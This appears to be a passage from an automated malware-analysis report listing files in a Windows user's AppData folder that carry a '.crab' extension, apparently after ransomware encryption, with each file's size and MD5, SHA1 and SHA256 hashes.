SHA1: 0ae6967e9b17f83525ebd1b2a68dd1bbbbb3bafb SHA256: e7ea07c3c3edeed4c2390e344c148f2d02f4d960e4de71e5b70c2eb85af03ca4 |
|
|
| c:\users\nd9e1fyi\appdata\roaming\adobe\acrobat\dc\security\crlcache\0fded5ceb68c302b1cdb2bddd9d0000e76539cb0.crl.crab | 1.14 KB |
MD5:
77c3dfeb6e7c910439ceb13793412d3a
SHA1: 01db9ff3c4f0644b703d32ca6a8e7b9f2dc323db SHA256: 693ff4318218952cc39d4c6534eb81e7f2274d3dde4851f77d6a4882923f39b2 |
|
|
| c:\users\nd9e1fyi\appdata\roaming\adobe\acrobat\dc\security\crlcache\ce338828149963dcea4cd26bb86f0363b4ca0ba5.crl.crab | 0.94 KB |
MD5:
038f0d3fa4f6c30bda347e14daa5d509
SHA1: 3a63eda2be6bbde9ed8e92e299d32c3a070fa80c SHA256: 1aff34b598561d6a511196a7de352e236109f0578c4912f64b2dac865a0f8f15 |
|
|
| c:\users\nd9e1fyi\appdata\roaming\adobe\logtransport2\logs\ulog_acrobat12_reader_3980e2e3-09b5-4737-a657-22675b06a39a_03db394c-1477-45d1-895c-00e42db7e723_0.rdy.crab | 23.34 KB |
MD5:
422c175e6e571cf2e4492c0db57061ee
SHA1: 41bceed183f6ce224cc0dca9d925927dff29db0d SHA256: 3316929aa2a8d8b7f24d4c2a963b098b542ea55227b541c628393e0565a7ae89 |
|
|
| c:\users\nd9e1fyi\appdata\roaming\adobe\logtransport2\logtransport2.cfg.crab | 0.73 KB |
MD5:
5dacfa3f9df2e8f4348e0d45e9ceed74
SHA1: 84466badd7fc255dd0ae18bbff5b7340d94b856c SHA256: 36c7c2d247c0313f9d1d96632ac13286b9ce48b5e424b50967a04fa884777fc8 |
|
|
| c:\users\nd9e1fyi\appdata\roaming\adobe\sonar\sonar1.0\sonar_policy.xml.crab | 18.84 KB |
MD5:
e65e1a2c9c85016aa94dc6aa760c57e6
SHA1: d9ff601028219fccb785065fd3090fcd50f45e1f SHA256: aa4a0f0ba0b26ad1dfe2840bf6d04784b8e96c51889200347283b0f8c73cdce3 |
|
|
| c:\users\nd9e1fyi\appdata\roaming\bc4ck.mp3.crab | 50.81 KB |
MD5:
f3e9ec68a907777d38584fbbafa33563
SHA1: adc75a14ca07b283854561c5a71fc609b4cd83d6 SHA256: 3f4a5974e890e7a2423dcca139577b2a4d7277d4e2b24ced7fdab96f1c533987 |
|
|
| c:\users\nd9e1fyi\appdata\roaming\cx 2hvtjnepkc.mp3.crab | 38.58 KB |
MD5:
2fe501450902ecb586556d3185442805
SHA1: 659e60b75850cf04c0f01734e42f416457731bd6 SHA256: 2d33695032ec3724b21038dc5da2731483ff0b58d40cce695b0bb1f3071347ea |
|
|
| c:\users\nd9e1fyi\appdata\roaming\d 3oihehyy3jgx.mp4.crab | 87.66 KB |
MD5:
b844612a261fa35f563f6e8fed742891
SHA1: a0f80bc7662764fcaeb715321314b3de15bbd715 SHA256: e80b65c06b5701001337bb24061b55786d0d1e1792cd11861cd7b2987fa77d27 |
|
|
| c:\users\nd9e1fyi\appdata\roaming\dz28ghwyj9-jvurmnbqv.ots.crab | 97.72 KB |
MD5:
36b6019f59d531e698b09ff9340cab6c
SHA1: 3b86abf0f7962fd32b76222ef324c9a8843a6a12 SHA256: a0328766660c9dc51a52bcd4e4acb62df7ee5d242411eb4915ac541e363c13ee |
|
|
| c:\users\nd9e1fyi\appdata\roaming\fezrnjyet8dxbnlxa.mp4.crab | 29.58 KB |
MD5:
b1c736b29b0e697b2d0d1090a003aed1
SHA1: 62c0f72a8194fb4d78be4d6f273bd81bbc60d829 SHA256: f10af594f52228588d6867e4fb1bae7ba0a436b1b2a28dc2a4244abaea651a4c |
|
|
| c:\users\nd9e1fyi\appdata\roaming\fkoq.odt.crab | 85.09 KB |
MD5:
a67864437f7df752af8067739eb9fead
SHA1: 5c68c6248fb43d41c415433277e55d0ad6da4890 SHA256: 87b90562688bebe43710921a5a3ef8b5787ee17ed516a326020b8ebd1337a635 |
|
|
| c:\users\nd9e1fyi\appdata\roaming\gflne6eca1jmfg6m8.mkv.crab | 87.67 KB |
MD5:
254a59ce4a44e6a2ccddcdcdebd0b2bd
SHA1: 5fa896a2497bcec5a80dcd1e7ca6a719568e088e SHA256: bab8f84304e72431acadc45dd0348f9da39c723a4e22cc5c785dae5a2d482f18 |
|
|
| c:\users\nd9e1fyi\appdata\roaming\im-xi-txjujxu8gwjean.avi.crab | 51.70 KB |
MD5:
cc02aad286bbc55c846334b9fcf97c23
SHA1: 2bca1d93c5a0921a9d7cc175bbba1128b015d127 SHA256: 8346acc9eb71d7ea8c9e5c6349400f8a3511a3a9c51787ee853b562c84c39c05 |
|
|
| c:\users\nd9e1fyi\appdata\roaming\ivmnctwjms.swf.crab | 98.47 KB |
MD5:
0ef0cc6639cce2a58068f5728f29cfb8
SHA1: 9984d40ab0cac952cce1567dd572c60c8795873a SHA256: 36c9e35afb1b56487098e9d116967099c08218dd1379e5f21c41845c6521883a |
|
|
| c:\users\nd9e1fyi\appdata\roaming\je8o8wzi8buok7-5nx6.m4a.crab | 8.41 KB |
MD5:
d82980ee504e39e8b872bf5c544ded94
SHA1: 67509d96388c9e4549839eb26a2457afba8e6554 SHA256: 8e4af37c3738adaa3e7d8cff2d1100b0b347968265695a47bf6a5a819076a95f |
|
|
| c:\users\nd9e1fyi\appdata\roaming\kdoskm.avi.crab | 5.95 KB |
MD5:
a7b942969f1bf68b179aeae423e4d378
SHA1: 0630f7af67c4c94dde2d6ad8b8da03c9873a38a6 SHA256: ad084a7dec745f4a3aaee85b041cec212553d93610df37ac680a30dc9425debf |
|
|
| c:\users\nd9e1fyi\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\settings.sol.crab | 1.02 KB |
MD5:
e2206511aff69f5b850d7ee6a919d27f
SHA1: ee4ca5d547dede4f68e1f0800bc49f1c8b25c09d SHA256: 62d05c8600db2b0702a08a711fba484251fa50f6ee3ac750422c9a0acf04c121 |
|
|
| c:\users\nd9e1fyi\appdata\roaming\microsoft\bibliography\style\apasixtheditionofficeonline.xsl.crab | 326.31 KB |
MD5:
61a3ee38ddc2f88dfc40025034077a92
SHA1: fb7e2435fd22aaef4d5b0d7056c8b470208bac10 SHA256: 051b6b195d37c676c45792a492e1a97b887682c33de73ef773fef87d75e4a383 |
|
|
| c:\users\nd9e1fyi\appdata\roaming\microsoft\bibliography\style\chicago.xsl.crab | 290.58 KB |
MD5:
f46785f453192d5fa1329a94665afe5f
SHA1: 1216204b959550a1a66e271cdb6073f6dacc1e2c SHA256: 4e598970a4f86cc010ce3b21af510d4b8cea876b3f1a872f7f8fefccecd4f5b4 |
|
|
| c:\users\nd9e1fyi\appdata\roaming\microsoft\bibliography\style\gb.xsl.crab | 262.89 KB |
MD5:
57b717430663f711e0764f54f75b1171
SHA1: be1f3bb094b8f1498be1c1df96440c837dd00da7 SHA256: 153a5e3ce6252846f9523a2478e0ba07ad33477cdf6658f0a5d824e831e75010 |
|
|
| c:\users\nd9e1fyi\appdata\roaming\microsoft\bibliography\style\gostname.xsl.crab | 250.88 KB |
MD5:
804d9447d5d2bb18e587d344f3e2dfcb
SHA1: 80a928f7ff94f126a9e65afe6c6f29f211bd5d49 SHA256: 5d6fc9f27eb1eeb05e5009eb9e52b870fa68add981e1e375fb53a321db44ef99 |
|
|
| c:\users\nd9e1fyi\appdata\roaming\microsoft\bibliography\style\gosttitle.xsl.crab | 246.08 KB |
MD5:
3911c8d6204fe569e721de94f0012e17
SHA1: ef594d1e156346303d06abb45abbf01cfe9d7935 SHA256: f01dcde8c722bb53f3870f2ade6d178c6c3484540ed2237e034c55b3c6028c77 |
|
|
| c:\users\nd9e1fyi\appdata\roaming\microsoft\bibliography\style\harvardanglia2008officeonline.xsl.crab | 278.66 KB |
MD5:
3839347e1addcada30ca46af95551fb6
SHA1: 820ef21437fb9dfc29447de715c26f5807bf29ed SHA256: 022bac14a6f2e6627c0123173ade165e6bde76bcf171ba0abaa57b4c1bcf9333 |
|
|
| c:\users\nd9e1fyi\appdata\roaming\microsoft\bibliography\style\ieee2006officeonline.xsl.crab | 288.14 KB |
MD5:
0cb7b278cc858433c4a247def784e45a
SHA1: 77cd02cb67c5dce7d59716b98ccf3646a55d2331 SHA256: 001ed2b3f7bf57a61394d678d8e65a7fd20d16d26291355528b5cb7410093ea5 |
|
|
| c:\users\nd9e1fyi\appdata\roaming\microsoft\bibliography\style\iso690.xsl.crab | 264.83 KB |
MD5:
355bff6c28a5f7534daa0d8acb1b5081
SHA1: 131cbc60972f1e53ba414340850852e0d7a60c92 SHA256: 8d85ac523e6689458187382686ea77a4e749d1b862e588e24fd8a73bf976e565 |
|
|
| c:\users\nd9e1fyi\appdata\roaming\microsoft\bibliography\style\iso690nmerical.xsl.crab | 213.00 KB |
MD5:
d49957312865f0a5b9da55be60742991
SHA1: 7dc3002b0834874fc99ac7c06a1bd8a5402bc82f SHA256: 96fc0864f529925fc710d58015cea830e68dcf982f8a1990ed99f6a7ca405d4e |
|
|
| c:\users\nd9e1fyi\appdata\roaming\microsoft\bibliography\style\mlaseventheditionofficeonline.xsl.crab | 249.77 KB |
MD5:
84908043b8b4075593e2354ab53eba99
SHA1: 9262318a94cea1501eea1db22543e7d8e3acb989 SHA256: ba45ccf8eb13d6870268d83c2ee6965340570ab76de31cef292fab83d8c93cf9 |
|
|
| c:\users\nd9e1fyi\appdata\roaming\microsoft\bibliography\style\sist02.xsl.crab | 245.97 KB |
MD5:
e912d2fc3c9283572d218869dd8502f3
SHA1: 6399f35b2bc5412e5854e3d2ceb800997a4eec44 SHA256: 6d505e8e8d511f7a25d837c39f70e70fe5322a1e660833efe5cbcde776567fb0 |
|
|
| c:\users\nd9e1fyi\appdata\roaming\microsoft\bibliography\style\turabian.xsl.crab | 337.11 KB |
MD5:
a1c6df9aa0c2e4d5a7d0fff984a16941
SHA1: 614c5eb554473012e2d12a1753b97ba3d00d9807 SHA256: ea2d96a2846045199eddd79e4f3800cdaab5b068c6b292ea58755174aef5b096 |
|
|
| c:\users\nd9e1fyi\appdata\roaming\microsoft\document building blocks\1033\16\built-in building blocks.dotx.crab | 3.53 MB |
MD5:
03571da0bb80d64c6740abdc86f2747d
SHA1: 82e22d7a3c682d859a6098623b9232a94c26e2ea SHA256: 307be3c2c5dffc70e0cef6bd9cc3ab84177c4bd7bdabdf7ce92cb39758cd59a8 |
|
|
| c:\users\nd9e1fyi\appdata\roaming\microsoft\office\mso1033.acl.crab | 37.38 KB |
MD5:
2ad3ef61650d42d6cd1e7d4d32a0bb41
SHA1: d6d2c8dd5bf597ac2b789c73537c9fc49969693b SHA256: 25ecd528bab6b79c7dc44ac022195582f25b70563d12c8d8884508d468270df4 |
|
|
| c:\users\nd9e1fyi\appdata\roaming\microsoft\office\recent\con2.lnk.crab | 0.80 KB |
MD5:
cf34cf8fb6e6d884e433b5105620ad94
SHA1: abcb1662e23aab31e092cc3b2989a578d9195fdc SHA256: 5b6224b3b725d33d463e8ab7b3292e8ab272a2bc859aaa83aa660b674c174457 |
|
|
| c:\users\nd9e1fyi\appdata\roaming\microsoft\office\recent\index.dat.crab | 0.58 KB |
MD5:
dd7637e5fad846ea1a9abc0da1a6a582
SHA1: e1e0bb8eb5d3a288e07f15e0705dda3720b18e8d SHA256: 5ffe4661bf10d535e4213fd173a822e1a8e6bc8e9652fb23db661340836cc55f |
|
|
| c:\users\nd9e1fyi\appdata\roaming\microsoft\office\recent\templates.lnk.crab | 1.67 KB |
MD5:
8e3a05c869f45c42ed7d70d9edb95c80
SHA1: 582593ada3ec554cf46769497cb93d3730ccc3b8 SHA256: f1579d60c5b585d2b8d4f6f89b15bc4830baf59d196d53ddbe3ed5e9007d2b4f |
|
|
| c:\users\nd9e1fyi\appdata\roaming\microsoft\outlook\outlook.srs.crab | 3.02 KB |
MD5:
2b615e096959c120e49b3c6795053480
SHA1: f2979cfb451dd8ac49867873f1843522b6605813 SHA256: a5d74a406637373b6913bdae41df22a769a624762fecaa1f6095dc38b3f260ca |
|
|
| c:\users\nd9e1fyi\appdata\roaming\microsoft\outlook\outlook.xml.crab | 2.81 KB |
MD5:
880b40cb7fda6e0c947f93d6f7d8295b
SHA1: fdff6cfca149248f52f19db1cb5964e40730ecf3 SHA256: 6b0e1782869f48951063dea5df7f8d4cb413e396a6048c7626020205089eecb0 |
|
|
| c:\users\nd9e1fyi\appdata\roaming\microsoft\publisher building blocks\contentstore.xml.crab | 0.69 KB |
MD5:
4dd2a758d59783a4eeb09cc3a04a622d
SHA1: 4e29aaca232e12721b3bd53f9faa4c0c968a41ba SHA256: ca4ab65f795c9cdaf35fc89fe26f483b915aaf34d0357d8b7ec15e532ba31a3f |
|
|
| c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\cashflow analysis.xltm.crab | 371.62 KB |
MD5:
6fbf4a75f316ffa5c06bd1d6e930d2b4
SHA1: 422d43d07965de56ea41654652cd4d661267df42 SHA256: 30b29fbd1522924f3957dbdc63701c9f2f23791b3b14d8944e9f2eddfe61f7ec |
|
|
| c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\document themes\1033\tm02836342[[fn=ion]].thmx.crab | 1.74 MB |
MD5:
de55d6587353d6bf651d31e57e39d9dc
SHA1: 470b17d26e4275bec3c555a1222676d91f509895 SHA256: c72b4845be666875977b608ae528ae63da2fa059d5ab535e734e09d89ebddadb |
|
|
| c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\document themes\1033\tm02892315[[fn=wisp]].thmx.crab | 769.42 KB |
MD5:
96a1156f8b5fc937b9438013329b178e
SHA1: e48ad051719a7e83e1c61b2b44d27d393220c49b SHA256: 0a66e6b45d194c7f73c84179bef2ec5460b4526a98106c376c12305337c538cb |
|
|
| c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\document themes\1033\tm02900688[[fn=facet]].thmx.crab | 721.64 KB |
MD5:
e6e7256fb78bdae9a6b2c9ace28befbd
SHA1: d5961f2e7e829be513061d5464993ec9beb55438 SHA256: a40560a001a8d7604c55f22615157f5d4c62126cbde19264d77a5535c1db5b5a |
|
|
| c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\document themes\1033\tm02900771[[fn=slice]].thmx.crab | 845.06 KB |
MD5:
cadb3c0da30291f89e092a5e02640bd0
SHA1: 8e76338061d3597f0b9794e634ca1a15c98b06f5 SHA256: df069e21bccf11b24ea9adc1d153086a1ccb634f5278fe7047c4cb29b450de40 |
|
|
| c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\document themes\1033\tm03090430[[fn=banded]].thmx.crab | 549.47 KB |
MD5:
81ef9a9b98cb8bde4b6f2773a49b5109
SHA1: 24437f20e0bb9c77326cb6b08ff67de466ab1795 SHA256: 2c65398b797782dbda743edf269d5ee1a24540b65437d37896ae435af8413bd1 |
|
|
| c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\document themes\1033\tm03090434[[fn=wood type]].thmx.crab | 1.57 MB |
MD5:
c1587dbe39c33e5bbbe5baad4186f86c
SHA1: 4785766c81ee062924ebdc9086971fdfadef8fba SHA256: 38aa5633e615b85cb386d7e860b02414e5a32f28e0decc73c90d6f85e8eb97d1 |
|
|
| c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\document themes\1033\tm03457444[[fn=basis]].thmx.crab | 545.48 KB |
MD5:
9e11fde89f689aa45e7f07013490b150
SHA1: 95f7f286411b5a11bdb3833932a315bf0fe0b678 SHA256: 224f658a958eadff784baea8710f1849017b31d1a75eb0b377b701e64baead51 |
|
|
| c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\document themes\1033\tm03457464[[fn=dividend]].thmx.crab | 558.05 KB |
MD5:
76051fa29994c47ed57de1bb58d1ff6c
SHA1: 3d84055384400a9b11d045b127b9fe17d343347e SHA256: 4d3c3b324b7cad1ad828ce043f1b1d7ee376ad673673d49df58d451dc05752d5 |
|
|
| c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\document themes\1033\tm03457475[[fn=frame]].thmx.crab | 511.31 KB |
MD5:
b8a5cd8176c89adc3a4a2193363e526b
SHA1: 89900d82dd654072ab503cfde4eaeb40509728ec SHA256: 9c68e2acd9e948583e47cbfce132330279e89f256786b8842b7f6ca8c3044f14 |
|
|
| c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\document themes\1033\tm03457485[[fn=mesh]].thmx.crab | 2.94 MB |
MD5:
f32b086c758f97a8a0bb563ee69e4b63
SHA1: 1d409d3907633a2e27bcc17d4c48a7f1eb781f71 SHA256: 6b6a783f9d5b827382a314e986ed85da31ced3b15f63d7612907ee457956a479 |
|
|
| c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\document themes\1033\tm03457491[[fn=metropolitan]].thmx.crab | 759.94 KB |
MD5:
3e8cae1f2393464a34304036dba60940
SHA1: d37c5d8ed5894482a76090989993436891bf6e3c SHA256: fb624f682c47a2436917519ed5276fcfeb5fc1d47e2000d2170fc7e5372bf673 |
|
|
| c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\document themes\1033\tm03457496[[fn=parallax]].thmx.crab | 903.53 KB |
MD5:
d83998fdc7808e89dfe49d74095695ce
SHA1: d254449176173cf448bd35d5712a4d8b3aa6f477 SHA256: 1f5b9e9180c1c85f6618dc8ce67f5b4926b7f8a0f682434ad5979b8d7972ded2 |
|
|
| c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\document themes\1033\tm03457503[[fn=quotable]].thmx.crab | 944.81 KB |
MD5:
2df1f26ee11ea5b50f80a441a9e731be
SHA1: 978732ff8c2cef5e3b5ca75b870fc64a50c10891 SHA256: 3bd8c57275a9e130e4ee82307266b8b03e478d13984807ca074f0d060d1718c9 |
|
|
| c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\document themes\1033\tm03457510[[fn=savon]].thmx.crab | 1.15 MB |
MD5:
75ca266e3f3744d3fa062938118a607e
SHA1: 5d699a89ef8627a1fed8b69c72a329ce2ce3e28d SHA256: 7573db225fed45775ef359c2af5092cdaa0ece59cc0c2bb373c1e7b46ecdf990 |
|
|
| c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\document themes\1033\tm03457515[[fn=view]].thmx.crab | 475.72 KB |
MD5:
ea3ce48fb687aed6551a5a06374da0f1
SHA1: cc603efec870ecec299af84ac10ee3a214db3374 SHA256: 33bee6160e3856a28b21d054286efcadc93641945eb98433cde11c226e0684c1 |
|
|
| c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\document themes\1033\tm04033917[[fn=berlin]].thmx.crab | 953.66 KB |
MD5:
8a820622207844e096523f1393cdae03
SHA1: 14a9aa68d0f51c6f2e92c6ccbe4ee9e06a727cdb SHA256: 8cafd429239e4a4249f961da17f8e10699406f1ed7a719dcb99f9d8b926248d7 |
|
|
| c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\document themes\1033\tm04033919[[fn=circuit]].thmx.crab | 1.40 MB |
MD5:
4199138446736e1d694428c3eeae187d
SHA1: b476989fd42a8126cf61821b66147753a4567de6 SHA256: f85935c1c1a7e3594d542f1dfba95941e361fb10edfafe753e6b7dbadbe8b2d2 |
|
|
| c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\document themes\1033\tm04033921[[fn=damask]].thmx.crab | 2.12 MB |
MD5:
334003e3df3ca09c1540157cd4158114
SHA1: ae1490e95ee5061599003a39fc724f4d4fd604c2 SHA256: e742b597c04f5484202e8d7854bd777f16c96e98241a3cc00ae89a4a1c64624c |
|
|
| c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\document themes\1033\tm04033925[[fn=droplet]].thmx.crab | 1.67 MB |
MD5:
34efa048b3ea9ebd0f9a1b2f1f37cd85
SHA1: 02950b2a44a2972b2d69afdc266bf50fef730ad9 SHA256: 4d223b5e94dab1176ac233043fd51750064212940d265b99e3c439ef5c516711 |
|
|
| c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\document themes\1033\tm04033927[[fn=main event]].thmx.crab | 2.79 MB |
MD5:
71e673229d545afcd21d0e9eabff13e4
SHA1: 98ba76cba61fddc2f606443df931f07255c3223f SHA256: 8e1b79a3213495106d1eb8192f083c7860378d49b6056a478aa84b0401ce184e |
|
|
| c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\document themes\1033\tm04033929[[fn=slate]].thmx.crab | 2.25 MB |
MD5:
140c122d2ab26e66817b466057e3e2cd
SHA1: 3cc83dff9bf971c5e6998ae560e4a953af99a788 SHA256: 7d7005ccc956843608a7769e6dabfa4bf8d5daa3d1be1406ff48cabfccd1a0f1 |
|
|
| c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\document themes\1033\tm04033937[[fn=vapor trail]].thmx.crab | 3.44 MB |
MD5:
6caabb81f15acdbe301f98beaa14ddd6
SHA1: 5b12a4305f7c414f41896ca2f9eabbfeb7a14472 SHA256: d21c0832a97db8966be533ffe1b3e40310a23c5de9f7cfbda389357bc0be7f8b |
|
|
| c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\document themes\1033\tm10001103[[fn=headlines]].thmx.crab | 527.48 KB |
MD5:
77772fdda18533fb399d31a79b5bd41e
SHA1: 93c58461bbadf31716de1c0664c4c4e617cf7e85 SHA256: 0ffc7ee508c3fbf97a3e797ca314e5170049315a560cee0a11b4040d84bc45ef |
|
|
| c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\document themes\1033\tm10001104[[fn=feathered]].thmx.crab | 1.96 MB |
MD5:
13d3b94fc0d7f2c3f6bf1af906f3de06
SHA1: 9a7ab73c4fbd36429ee0ec30b72be0de0639f6c7 SHA256: 187f252095ef5fd6c4635efc0d37e8e4cbe672cfa6b0ebfc07568427e6c641ee |
|
|
| c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\document themes\1033\tm10001105[[fn=crop]].thmx.crab | 524.55 KB |
MD5:
a658ab33e435b66271ff2735070bc1ae
SHA1: 3bf521890aedc02e37ce1ae90156e6cc5a3d2675 SHA256: 098370223da5fe1d7e241a5572cf485d3ffa525622241c67b655eafe55fcb5d6 |
|
|
| c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\document themes\1033\tm10001114[[fn=gallery]].thmx.crab | 1.04 MB |
MD5:
0e137e1a97d9ece35730a1bcc5c725e4
SHA1: 091f9b513026a523221524ba9c647866334ab79e SHA256: cef0ceb911413c1d37ed2bb2dca1843bca1270ee45852b2d0e100358de6982e5 |
|
|
| c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\document themes\1033\tm10001115[[fn=parcel]].thmx.crab | 594.39 KB |
MD5:
aae7bfa272d494f8a82fb221e38c6152
SHA1: bb22016a715ba32cf1bb3855d15daad070ebee11 SHA256: 4e1c176116fd1c184456cbc72f5a9ae28ac423b7b766f54c02e99505137b5230 |
|
|
| c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\document themes\1033\tm16401371[[fn=atlas]].thmx.crab | 838.08 KB |
MD5:
089003123a93a54095b84c782d64cc0d
SHA1: f052a9cbb0bfc268d99eb2460563b52a9b8c454f SHA256: 12f1e3598c7bea2668f7fcf6e28401c14b71996cf821d494e93ba39240a1013f |
|
|
| c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\smartart graphics\1033\tm03328884[[fn=architecture]].glox.crab | 6.17 KB |
MD5:
c8ccb0a33a1e89dbae2b8a2c80dfbb54
SHA1: 49c842e354f3f3e945d4cc9c63cb76123911d05d SHA256: ba0f111a8bfb4b89e0e14e2a311ba0373f347f8885c48b5515550053b0c719e9 |
|
|
| c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\smartart graphics\1033\tm03328893[[fn=bracketlist]].glox.crab | 4.45 KB |
MD5:
ac89297bf30514673fe1965b317310f8
SHA1: c599ede6b5c90303e53edd11452da9af15b1749d SHA256: 566af0bc0d7c2537f74cb82bd8b1d261329c1828cc9af022f930bde043502424 |
|
|
| c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\smartart graphics\1033\tm03328905[[fn=chevron accent]].glox.crab | 4.67 KB |
MD5:
ee0ad0d74bc343bb765993d1e1927715
SHA1: 0413b48c305fb886df035054555a734d90cd5712 SHA256: dc41363805e06bf8192b53d2874b5bcbf673b784c6ecbbc2a41a717152e0f3d0 |
|
|
| c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\smartart graphics\1033\tm03328908[[fn=circle process]].glox.crab | 16.94 KB |
MD5:
c73c05a2b3d08f3c835e46022e6a0995
SHA1: 01fad837e31568dd910860ca806513d060c22ab4 SHA256: b9dcd3cbc5850bd8cd3dca901035e17c037194f787db7ea23c191bde84a3dbf6 |
|
|
| c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\smartart graphics\1033\tm03328916[[fn=converging text]].glox.crab | 11.64 KB |
MD5:
8d05ce5a1d952e77a66b7745521c9a4e
SHA1: 7a724bfa431318a9f2c5e1a5053e94d5374fd0d5 SHA256: d5dff5e3ebb526a3bc72bd6e842269a55ec3bbf222f3dcbda6e659a4b5b83ad3 |
|
|
| c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\smartart graphics\1033\tm03328919[[fn=hexagon radial]].glox.crab | 6.41 KB |
MD5:
8c99449400a45e9860609fb3ed01c5d2
SHA1: f0b667e7c29495a3b28fea23ea0cb11e72312288 SHA256: 16c30fde40e946ea1533e2b31b7de34d039b375abf93b3e25ec33b726b2b94c5 |
|
|
| c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\smartart graphics\1033\tm03328925[[fn=interconnected block process]].glox.crab | 9.50 KB |
MD5:
b95e65f7df800345595d282671783967
SHA1: 2d6593fab6565a1b77a87e298e55fa3cd5e82907 SHA256: 659b1be0f0e31374485765126ca102fcef1dac8a742b54993e64e9192486991d |
|
|
| c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\smartart graphics\1033\tm03328932[[fn=picture frame]].glox.crab | 4.75 KB |
MD5:
ed2268e6b7d03e19b10bc51cbe48dfee
SHA1: 6be77f4cd704e4322d8371413bd4eb5ac4a8ee88 SHA256: 8b80d60311bdf13af368abc18be54f1e4d02e51ba2561c6f6ffcd5d724f0228d |
|
|
| c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\smartart graphics\1033\tm03328935[[fn=picture organization chart]].glox.crab | 7.72 KB |
MD5:
8b843a80f395b6d6c95278f33d963dc2
SHA1: 9c6e8529d59af49bc428eb27fb1884413d95c052 SHA256: 7705434148324bb8554deee1b4546563653933962f8e75ca070ae641073607f7 |
|
|
| c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\smartart graphics\1033\tm03328940[[fn=radial picture list]].glox.crab | 5.98 KB |
MD5:
53a3b1d5f08fc78d58f7a329b24c12f0
SHA1: 2aa4a8e306629ccde7bee321602fc2d3d6b1d055 SHA256: c5d06fab058d226bc0c7f01b404fa0e9f1bdcf602ee5c8ec0629d39e99eda707 |
|
|
| c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\smartart graphics\1033\tm03328951[[fn=tabbed arc]].glox.crab | 4.12 KB |
MD5:
7e32ad78273a5800adcbac60ed9086a1
SHA1: 0a020eb56ab0b3de706b6e7d5af9beb7aaa03690 SHA256: dd80735eba4ded6b972e6b1c55b177efe94b326e8dd06698ff3748365eab2fb5 |
|
|
| c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\smartart graphics\1033\tm03328972[[fn=tab list]].glox.crab | 5.30 KB |
MD5:
c3d72112eda09f922641157694a0e612
SHA1: 50511a09958d40049549fefe2bd5c5b975616bfe SHA256: 4e8e5ac549866c26c81e947952a3ed965bd5f0d6e4092b18fe2de37f5940d240 |
|
|
| c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\smartart graphics\1033\tm03328975[[fn=theme picture accent]].glox.crab | 6.81 KB |
MD5:
bb2d0dc89e3924acd43385d5249aa377
SHA1: ac603d8e4aa8bc5c79bda9b07bdcdea2ff93d918 SHA256: 8219e86680e9d0264519035febab5c01c80590cc1fd474e678e372114a252280 |
|
|
| c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\smartart graphics\1033\tm03328983[[fn=theme picture alternating accent]].glox.crab | 6.02 KB |
MD5:
3a5287118dcdce143e892c08edb5f41e
SHA1: b6d77ac878cdcf6dc65a48ce5942429eb7aa4901 SHA256: 3d0c69b04acdfe8095fb2da534d655b90e6963c85d3c7f0c1d6a79cf905eb100 |
|
|
| c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\smartart graphics\1033\tm03328986[[fn=theme picture grid]].glox.crab | 6.58 KB |
MD5:
8d080a225a342e59d2e903077cd8ade2
SHA1: 8ff8379435f7cd191fe5ed7a2e3a2609293af53f SHA256: 6e67cf55d3dea09524b4a8e392d25ebab6d61ac6bb83d6a151bfe42174707b26 |
|
|
